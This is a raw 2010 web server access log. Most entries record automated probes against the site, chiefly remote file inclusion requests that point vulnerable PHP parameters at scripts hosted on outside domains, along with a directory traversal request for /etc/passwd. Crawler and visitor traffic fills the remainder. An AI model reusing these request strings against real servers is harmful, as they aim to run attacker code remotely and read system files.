78.110.50.139 - - [01/May/2010:15:52:39 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:40 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:40 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:40 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:42 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:43 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:43 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:44 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:46 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:46 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:46 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:47 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:52:50 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:05 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:05 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:05 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:08 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:08 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:08 -0500] "GET /logs/access_log.1263081600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:08 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:15:53:09 -0500] "GET //bbs/////////write_update.php?board_skin_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:15:53:09 -0500] "GET /logs//bbs/////////write_update.php?board_skin_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:15:53:09 -0500] "GET /logs/access_log.1268611200%20%20//bbs/////////write_update.php?board_skin_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:11 -0500] "GET /logs/access_log.1263081600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:11 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:11 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:15:53:14 -0500] "GET /logs/access_log.1270684800%20%20//bbs/////////write_update.php?board_skin_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:39 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:39 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:39 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:49 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:54 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:53:55 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:15:54:11 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:15:54:11 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:15:54:11 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:54:13 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:54:16 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:54:16 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:15:54:21 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:15:54:34 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.26.98 - - [01/May/2010:15:59:56 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:15:59:56 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:15:59:56 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:16:00:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:16:00:45 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.26.98 - - [01/May/2010:16:00:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:01:14 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:01:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:01:14 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:02:17 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:02:17 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
74.50.85.15 - - [01/May/2010:16:02:17 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolut_path=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:16:03:17 -0500] "GET /logs/access_log.1264291200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/May/2010:16:03:26 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [01/May/2010:16:04:26 -0500] "GET /logs/access_log.1208649600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:16:10:18 -0500] "GET /logs/access_log.1264636800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.50 - - [01/May/2010:16:10:55 -0500] "GET /logs/access_log.1265068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/May/2010:16:11:16 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [01/May/2010:16:12:25 -0500] "GET /logs/access_log.1239235200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:16:12:27 -0500] "GET /logs/access_log.1241481600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:16:12:30 -0500] "GET /logs/access_log.1242172800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:16:12:32 -0500] "GET /logs/access_log.1245283200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:16:12:34 -0500] "GET /logs/access_log.1252627200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.49 - - [01/May/2010:16:14:55 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:16:15:39 -0500] "GET /logs/access_log.1171756800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/May/2010:16:22:47 -0500] "GET /logs/access_log.1272240000 HTTP/1.1" 200 478712 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.46 - - [01/May/2010:16:22:55 -0500] "GET /logs/access_log.1238457600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.131.91.180 - - [01/May/2010:16:26:48 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:26:48 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:26:48 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:26:50 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:26:50 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:26:50 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.201 - - [01/May/2010:16:30:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/May/2010:16:33:01 -0500] "GET /logs/access_log.1193270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [01/May/2010:16:33:54 -0500] "GET /logs/access_log.1186099200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.239 - - [01/May/2010:16:35:25 -0500] "GET /logs/access_log.1226534400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
187.27.219.224 - - [01/May/2010:16:35:45 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "http://www.google.com/search?hl=pt-BR&lr=&client=iceweasel-a&rls=org.mozilla:pt-BR:unofficial&q=%22freebsd%22+%22claro3g%22&start=20&sa=N""Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.1.9) Gecko/20100414 Iceweasel/3.5.9 (like Firefox/3.5.9)"
187.27.219.224 - - [01/May/2010:16:35:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.1.9) Gecko/20100414 Iceweasel/3.5.9 (like Firefox/3.5.9)"
187.27.219.224 - - [01/May/2010:16:35:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.1.9) Gecko/20100414 Iceweasel/3.5.9 (like Firefox/3.5.9)"
87.250.255.243 - - [01/May/2010:16:44:19 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 200 667216 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.39.162 - - [01/May/2010:16:44:47 -0500] "GET /logs/access_log.1266278400////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:16:44:47 -0500] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:16:44:47 -0500] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.46.204.227 - - [01/May/2010:16:44:55 -0500] "GET /logs/access_log.1206662400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.46 - - [01/May/2010:16:45:54 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.39.12.10 - - [01/May/2010:16:46:41 -0500] "GET /logs//index.php?root_PATH=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.39.12.10 - - [01/May/2010:16:46:42 -0500] "GET //index.php?root_PATH=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel1.gif HTTP/1.1" 200 61946 "http://tomdolan.pconline.com/artwork/carousel.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel2.gif HTTP/1.1" 200 60360 "http://tomdolan.pconline.com/artwork/carousel.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel4.gif HTTP/1.1" 200 62610 "http://tomdolan.pconline.com/artwork/carousel.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel3.gif HTTP/1.1" 200 62851 "http://tomdolan.pconline.com/artwork/carousel.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:09 -0500] "GET /artwork/carousel5.gif HTTP/1.1" 200 69694 "http://tomdolan.pconline.com/artwork/carousel.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.167.200.78 - - [01/May/2010:16:47:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
207.46.13.138 - - [01/May/2010:16:47:55 -0500] "GET /logs/access_log.1255651200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.39.12.10 - - [01/May/2010:16:49:02 -0500] "GET //index.php?root_PATH=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.205.1.227 - - [01/May/2010:16:49:47 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:47 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:47 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:51 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:51 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:52 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:56 -0500] "GET /logs/access_log.1251504000//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:58 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:58 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:58 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:59 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:59 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.205.1.227 - - [01/May/2010:16:49:59 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:07 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:07 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:07 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:10 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:10 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:10 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:11 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:11 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:11 -0500] "GET /logs//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:15 -0500] "GET //index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:16:50:15 -0500] "GET /logs/access_log.1262649600//index1.php?s=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
